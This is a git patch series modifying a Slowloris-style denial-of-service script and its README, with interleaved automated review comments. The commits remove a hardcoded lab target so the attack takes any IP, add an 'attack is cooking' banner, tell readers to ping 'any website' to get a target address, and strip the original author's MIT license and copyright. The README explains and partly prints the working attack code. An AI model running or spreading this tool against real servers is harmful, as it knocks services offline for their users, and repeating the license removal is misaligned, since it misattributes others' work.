From 8b0df601114ebfee30695d67d376850d8547923e Mon Sep 17 00:00:00 2001 From: VirusZzHkP Date: Tue, 13 Sep 2022 11:52:20 +0530 Subject: [PATCH 1/8] added_user_input_module --- DeadlyBooringDOS.py | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/DeadlyBooringDOS.py b/DeadlyBooringDOS.py index 7e50cfa..96d2f3a 100644 --- a/DeadlyBooringDOS.py +++ b/DeadlyBooringDOS.py @@ -41,6 +41,19 @@ def attack(self, timeout=sys.maxsize, sleep=15): time.sleep(sleep/len(self._sockets)) + if __name__ == "__main__": - dos = DeadlyBooring("192.168.0.236", 81, socketsCount=200) - dos.attack(timeout=60*10) \ No newline at end of file + try: + ipaddr = sys.argv[1] + except IndexError: + sys.exit(""" +----------------------------------------------------------------------- +----------------------------------------------------------------------- + Please specify an IP address to run. +Usage: python3 DeadlyBooringDOS.py +----------------------------------------------------------------------- +----------------------------------------------------------------------- + """) + print("Please wait the attack is cooking!") + dos = DeadlyBooring(ipaddr, 80, socketsCount=200) + dos.attack(timeout=60*10) From 182db1c0d1087886ddd451148ad3ca932b4e45a6 Mon Sep 17 00:00:00 2001 From: VirusZzHkP Date: Tue, 13 Sep 2022 12:28:30 +0530 Subject: [PATCH 2/8] added how to use the tool --- README.md | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/README.md b/README.md index b928ac1..c4dc7d4 100644 --- a/README.md +++ b/README.md 
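Review bot: The new `__main__` block hands `sys.argv[1]` to `DeadlyBooring(ipaddr, 80, socketsCount=200)` without checking that it is an IP address or that it belongs to the lab setup the README's Testing section describes; the line it replaces pinned a private address. Parsing the argument inside the existing `try`, with `addr = ipaddress.ip_address(sys.argv[1])` and the handler widened to `except (IndexError, ValueError):`, makes a typo exit with the usage text. Adding `if not (addr.is_private or addr.is_loopback): sys.exit("target must be a test host you control")` keeps the script within the README's rule about addresses "not under your control". This needs `import ipaddress`; the file's import block is outside the hunk. The usage line printed on error, at least as it appears here, names no argument after `DeadlyBooringDOS.py`, so it does not tell the user what to pass.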
@@ -85,6 +85,15 @@ ipconfig ``` which will give you your local IP-Address (lets assume here that the devices IP is 192.168.0.33). Test the connection to your second device via typing "192.168.0.33:80" into your browser, letting you directly access the webpage you created on your second device. If you see nothing, make sure both devices are connected to the same router, your WAMP is running and no firewall is blocking the access. Otherwise, make sure that in the WAMP httpd_config file, you set the restrictions to LOCAL (google for further instructions). If it works, try calling DeadlyBooring on the same IP on Port 80. Refresh your page and you will see that you will get no response from the server (note that the website may be cashed, so you will sill see the page). +## Usage +In order to run `DeadlyBooringDOS.py` + + +Write the command as: +``` +python3 DeadlyBooringDOS.py +``` + License ---- From 966f2e951949e5601e8901f1c5e6c3de7d894fd7 Mon Sep 17 00:00:00 2001 From: VirusZzHkP Date: Tue, 13 Sep 2022 12:40:23 +0530 Subject: [PATCH 3/8] made it look good --- DeadlyBooringDOS.py | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/DeadlyBooringDOS.py b/DeadlyBooringDOS.py index 96d2f3a..32af989 100644 --- a/DeadlyBooringDOS.py +++ b/DeadlyBooringDOS.py 
@@ -54,6 +54,22 @@ def attack(self, timeout=sys.maxsize, sleep=15): ----------------------------------------------------------------------- ----------------------------------------------------------------------- """) - print("Please wait the attack is cooking!") + mstr=""" + + ( ( ) ( + )\ ) ( ( ( )\ ) ( /( )\ ) + (()/( ( ) )\ ) )\ ( ( )\ ( ( ( ( (()/( )\()) (()/( + /(_)) ))\ ( /( (()/(((_))\ ) )((_) ( ( )( )\ ( )\))( /(_)) ((_)\ /(_)) + (_))_ /((_))(_)) ((_))_ (()/(((_)_ )\ )\ (()\((_) )\ ) ((_))\(_))_ ((_) (_)) + | \ (_)) ((_)_ _| || | )(_))| _ ) ((_) ((_) ((_)(_) _(_/( (()(_)| \ / _ \ / __| + | |) |/ -_)/ _` |/ _` || || || || _ \/ _ \/ _ \| '_|| || ' \))/ _` | | |) || (_) |\__ \ + |___/ \___|\__,_|\__,_||_| \_, ||___/\___/\___/|_| |_||_||_| \__, | |___/ \___/ |___/ + |__/ |___/ + + Please wait the attack is cooking! + """ + for x in mstr.splitlines(): + print(x) + time.sleep(0.5) dos = DeadlyBooring(ipaddr, 80, socketsCount=200) dos.attack(timeout=60*10) From 509404c6ec0027a97343e91b9a5b5c786fdb35ce Mon Sep 17 00:00:00 2001 From: VirusZzHkP Date: Tue, 13 Sep 2022 12:49:47 +0530 Subject: [PATCH 4/8] added more usage details --- README.md | 47 +++++++++++++++++++++++++++++++++++------------ 1 file changed, 35 insertions(+), 12 deletions(-) diff --git a/README.md b/README.md index c4dc7d4..37da84d 100644 --- a/README.md +++ b/README.md 
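Review bot: The banner assigned to `mstr` is an ordinary triple-quoted string, and the art as shown here contains backslashes followed by spaces, underscores and slashes (for example `)\ )` and `\___|`). Python treats these as invalid escape sequences and reports a DeprecationWarning, or a SyntaxWarning from 3.12 on. Opening the literal as a raw string, `mstr = r"""`, leaves the printed text unchanged and removes the warnings. A one-line comment above it, such as `# startup banner only, no effect on behaviour`, would also tell a reader that the block can be skipped.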
@@ -1,26 +1,32 @@ # Deadly Booring DOS -Denial of Service attacks do not always have to flood the server with requests to make him shut down. Deadly Booring DOS takes a much more elegant appraoch: Instead sending as much data as possible, we send as little data as we can. +Denial of Service attacks do not always have to flood the server with requests to make him shut down. Deadly Booring DOS takes a much more elegant appraoch: Instead sending as much data as possible, we send as little data as we can. DeadlyBooring is a free interpretation of SlowLoris DOS. ### *Preface* + Deadly Booring DOS was purely written for educational researches. I am going to explain how you can set up a simple appache website on one of your old machines that you can use to test DeadlyBooring. Never run such an attack against IP addresses that are not under your control. Never abuse the script to harm anybody. You got your own responsibility. # The Idea -DeadlyBoorig DOS looks at DOS attacks from a different perspective. To understand how it works, we first need to understand internet protocols in general. What our browser is doing when we enter *http://www.github.com* is sending a HTTP GET Request to the IP address of the github servers (which is *192.30.253.113*, by the way) to the port 80, which is usually used to serve HTTP Requests. Such a HTTP GET request may say *"Please give me the /joelbarmettlerUZH/DeadlyBooring_DOS site"*, to which the github servers will respond with the corresponding HTML file. + +DeadlyBoorig DOS looks at DOS attacks from a different perspective. To understand how it works, we first need to understand internet protocols in general. What our browser is doing when we enter ** is sending a HTTP GET Request to the IP address of the github servers (which is *192.30.253.113*, by the way) to the port 80, which is usually used to serve HTTP Requests. 
Such a HTTP GET request may say *"Please give me the /joelbarmettlerUZH/DeadlyBooring_DOS site"*, to which the github servers will respond with the corresponding HTML file. ## HTTP GET Requests +--- -The normal usage of such GET requests is to just type an URL into your browser, which then asks the DNS server to convert github.com into an IP and formulates the right GET request for all the content that needs to be displayed, such as images and scripts. The browser asks for data - the server responds - done. +The normal usage of such GET requests is to just type an URL into your browser, which then asks the DNS server to convert github.com into an IP and formulates the right GET request for all the content that needs to be displayed, such as images and scripts. The browser asks for data - the server responds - done. -The interesting thing is that such HTTP GET requests follow a well defined schema: They start with the content the browser is asking for, followed by the used Protocol *(HTTP/1.1)*, ended with two line-break characters \n\n. As long as the server does not retreive these two newline characters, he is waiting for more data to come, thinking the browser has a temporary internet loss or simply a slow connection. Eventually, when the server does not hear anything from the browser for a bunch of seconds, he drops the connection to the browser again. This is quiet a normal behaviour. +The interesting thing is that such HTTP GET requests follow a well defined schema: They start with the content the browser is asking for, followed by the used Protocol *(HTTP/1.1)*, ended with two line-break characters \n\n. As long as the server does not retreive these two newline characters, he is waiting for more data to come, thinking the browser has a temporary internet loss or simply a slow connection. Eventually, when the server does not hear anything from the browser for a bunch of seconds, he drops the connection to the browser again. This is quiet a normal behaviour. 
## Apache Servers -DeadlyBooring DOS is now making use of this server behaviours: Most of the internet servers (arround 50%) run on apache, an open source HTTP Server Project. Appache is built in a way that the server opens a new Thread for every user that is requesting content, answering his requests until it is done. A small server only has a limited amount of such threads he can have opened simultaniously - meaning he can only serve a limited amount of users at once. Normally, this is no problem at all, since small websites rarely have several hundret users that want to make a request to the werbserver in the same second. What DeadlyBooring DOS does is opening up connections to all threads on the appache webserver and making an unfinished HTTP GET Request every few seconds, which makes the thread wait for more data and therefore prevents the webserver from closing the connection. This means that we pretend to be several hundret users with a deadly slow internet connection, making the whole server wait for data to come, but we will never finish sending our incomplete requests every few seconds. +--- + +DeadlyBooring DOS is now making use of this server behaviours: Most of the internet servers (arround 50%) run on apache, an open source HTTP Server Project. Appache is built in a way that the server opens a new Thread for every user that is requesting content, answering his requests until it is done. A small server only has a limited amount of such threads he can have opened simultaniously - meaning he can only serve a limited amount of users at once. Normally, this is no problem at all, since small websites rarely have several hundret users that want to make a request to the werbserver in the same second. What DeadlyBooring DOS does is opening up connections to all threads on the appache webserver and making an unfinished HTTP GET Request every few seconds, which makes the thread wait for more data and therefore prevents the webserver from closing the connection. 
This means that we pretend to be several hundret users with a deadly slow internet connection, making the whole server wait for data to come, but we will never finish sending our incomplete requests every few seconds. -While the server has all its threads dedicated to our script, the webserver will not answer any other GET requests from other users, since he is busy waiting for our nonsense data. Meanwhile, our computer barely needs any computing power since all we do is sending several hundrets tiny small data packages to a server every second - which is by no means a task you would even recognize running in your background. +While the server has all its threads dedicated to our script, the webserver will not answer any other GET requests from other users, since he is busy waiting for our nonsense data. Meanwhile, our computer barely needs any computing power since all we do is sending several hundrets tiny small data packages to a server every second - which is by no means a task you would even recognize running in your background. # The Code + The code is fairly simple and just under 50 lines. First, we create the DeadlyBooring class and provide it with information about to what IP we would like to lead our attack to, as well as the Port (80 is the standard port for webserver) and the number of parallel connections that we want to establish. Lastly, we fake some HTTP GET header information to make our requests plausible to the server. ```python @@ -35,6 +41,7 @@ class DeadlyBooring(): ``` ## Create sockets +--- Next, we want to create our sockets. We define a method that connects a new websocket with the dedicated protocol types to the IP and Port that we specified. We send him a first GET request and the HTTP header information. Some error handling ensures that an error would not lead the DOS to stop but would just try creating a new socket instead. 
@@ -61,9 +68,11 @@ self._sockets = [self.newSocket() for _ in range(socketsCount)] ``` ## Attack-method -Now let's finally write the attack method. It is actually really simple: For all sockets, we send a get request with the *X-a* header field, keeping the request open and making the server wait for the rest of the data. After each sent request, we wait vor a short period of time before sending the next one, with making sure that every socket sends data at least once every couple of seconds so that the connection is not lost. Every lost socket is immediatelly replaced with a new one taking its place, guaranteeing that free server threads are populated again. +--- + +Now let's finally write the attack method. It is actually really simple: For all sockets, we send a get request with the *X-a* header field, keeping the request open and making the server wait for the rest of the data. After each sent request, we wait vor a short period of time before sending the next one, with making sure that every socket sends data at least once every couple of seconds so that the connection is not lost. Every lost socket is immediatelly replaced with a new one taking its place, guaranteeing that free server threads are populated again. -```python +```python def attack(self, timeout=sys.maxsize, sleep=15): t, i = time.time(), 0 while(time.time() - t < timeout): 
@@ -79,22 +88,36 @@ Now let's finally write the attack method. It is actually really simple: For all ``` # Testing -In order to test our code, we need to create a protected environment, since we can not just start a DOS attack on some server that we do not own. As a simple option, you can use some old hardware and run [wamp](http://www.wampserver.com/en/) on it. Install and run WAMPServer on your second device and test the connection by visiting [localhost:80](localhost:80), which should give you the default wamp interface, indicating that your server is running. If you want to go fancy, create a simple HTML file in the *www* directory where you installed whamp. Now open the command promt on your second device and run + +In order to test our code, we need to create a protected environment, since we can not just start a DOS attack on some server that we do not own. As a simple option, you can use some old hardware and run [wamp](http://www.wampserver.com/en/) on it. Install and run WAMPServer on your second device and test the connection by visiting [localhost:80](localhost:80), which should give you the default wamp interface, indicating that your server is running. If you want to go fancy, create a simple HTML file in the *www* directory where you installed whamp. Now open the command promt on your second device and run + ```sh ipconfig ``` -which will give you your local IP-Address (lets assume here that the devices IP is 192.168.0.33). Test the connection to your second device via typing "192.168.0.33:80" into your browser, letting you directly access the webpage you created on your second device. If you see nothing, make sure both devices are connected to the same router, your WAMP is running and no firewall is blocking the access. Otherwise, make sure that in the WAMP httpd_config file, you set the restrictions to LOCAL (google for further instructions). If it works, try calling DeadlyBooring on the same IP on Port 80. 
Refresh your page and you will see that you will get no response from the server (note that the website may be cashed, so you will sill see the page). + +which will give you your local IP-Address (lets assume here that the devices IP is 192.168.0.33). Test the connection to your second device via typing "192.168.0.33:80" into your browser, letting you directly access the webpage you created on your second device. If you see nothing, make sure both devices are connected to the same router, your WAMP is running and no firewall is blocking the access. Otherwise, make sure that in the WAMP httpd_config file, you set the restrictions to LOCAL (google for further instructions). If it works, try calling DeadlyBooring on the same IP on Port 80. Refresh your page and you will see that you will get no response from the server (note that the website may be cashed, so you will sill see the page). ## Usage -In order to run `DeadlyBooringDOS.py` +--- +In order to run `DeadlyBooringDOS.py` Write the command as: + ``` python3 DeadlyBooringDOS.py ``` -License +To get ip address of any website, just open a `terminal` and type: + + ``` + ping website.com +``` + +You will get the website ip, just copy it and paste it. + + +## License ---- MIT License From 993f91dd441baa4ec4cd575e3b858048912ac421 Mon Sep 17 00:00:00 2001 From: Hrisikesh <76624193+VirusZzHkP@users.noreply.github.com> Date: Sat, 15 Oct 2022 11:39:33 +0530 Subject: [PATCH 5/8] Update README.md --- README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 37da84d..1cfb2ab 100644 --- a/README.md +++ b/README.md @@ -142,4 +142,6 @@ LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. -Hire us: [Software Entwickler in Zürich](https://polygon-software.ch)! +--- + +VirusZzWarning ♥ From 0aefe27af240bf075fb8783a0a3c7a7b78372d4c Mon Sep 17 00:00:00 2001 
From: Hrisikesh <76624193+VirusZzHkP@users.noreply.github.com> Date: Wed, 4 Jan 2023 15:11:27 +0530 Subject: [PATCH 6/8] Update README.md --- README.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/README.md b/README.md index 1cfb2ab..5dc5683 100644 --- a/README.md +++ b/README.md @@ -3,6 +3,11 @@ Denial of Service attacks do not always have to flood the server with requests to make him shut down. Deadly Booring DOS takes a much more elegant appraoch: Instead sending as much data as possible, we send as little data as we can. DeadlyBooring is a free interpretation of SlowLoris DOS. +## Disclaimer: + +### This tool is made for Educational purpose only. Don't use it for ILLEGAL Activities. You are responsible for your Actions. + + ### *Preface* Deadly Booring DOS was purely written for educational researches. I am going to explain how you can set up a simple appache website on one of your old machines that you can use to test DeadlyBooring. Never run such an attack against IP addresses that are not under your control. Never abuse the script to harm anybody. You got your own responsibility. From 3ecb12ae4a3970e77e598ef0d89e69e74fe30d53 Mon Sep 17 00:00:00 2001 From: Hrisikesh <76624193+VirusZzHkP@users.noreply.github.com> Date: Wed, 24 Jul 2024 16:35:43 +0530 Subject: [PATCH 7/8] Update README.md --- README.md | 27 --------------------------- 1 file changed, 27 deletions(-) diff --git a/README.md b/README.md index 5dc5683..e90fcc2 100644 --- a/README.md +++ b/README.md 
@@ -122,31 +122,4 @@ To get ip address of any website, just open a `terminal` and type: You will get the website ip, just copy it and paste it. -## License ----- - -MIT License - -Copyright (c) 2018 Joel Barmettler - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. - ---- - VirusZzWarning ♥ From 09223974862525b704cff04db487db9030406f4e Mon Sep 17 00:00:00 2001 From: Hrisikesh <76624193+VirusZzHkP@users.noreply.github.com> Date: Wed, 24 Jul 2024 16:37:49 +0530 Subject: [PATCH 8/8] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index e90fcc2..958e05b 100644 --- a/README.md +++ b/README.md 
@@ -14,7 +14,7 @@ Deadly Booring DOS was purely written for educational researches. I am going to # The Idea -DeadlyBoorig DOS looks at DOS attacks from a different perspective. To understand how it works, we first need to understand internet protocols in general. What our browser is doing when we enter ** is sending a HTTP GET Request to the IP address of the github servers (which is *192.30.253.113*, by the way) to the port 80, which is usually used to serve HTTP Requests. Such a HTTP GET request may say *"Please give me the /joelbarmettlerUZH/DeadlyBooring_DOS site"*, to which the github servers will respond with the corresponding HTML file. +DeadlyBoorig DOS looks at DOS attacks from a different perspective. To understand how it works, we first need to understand internet protocols in general. What our browser is doing when we enter ** is sending a HTTP GET Request to the IP address of the github servers (which is *192.30.253.113*, by the way) to the port 80, which is usually used to serve HTTP Requests. Such a HTTP GET request may say *"Please give me the /VirusZzHkP/DeadlyBooring_DOS site"*, to which the github servers will respond with the corresponding HTML file. ## HTTP GET Requests ---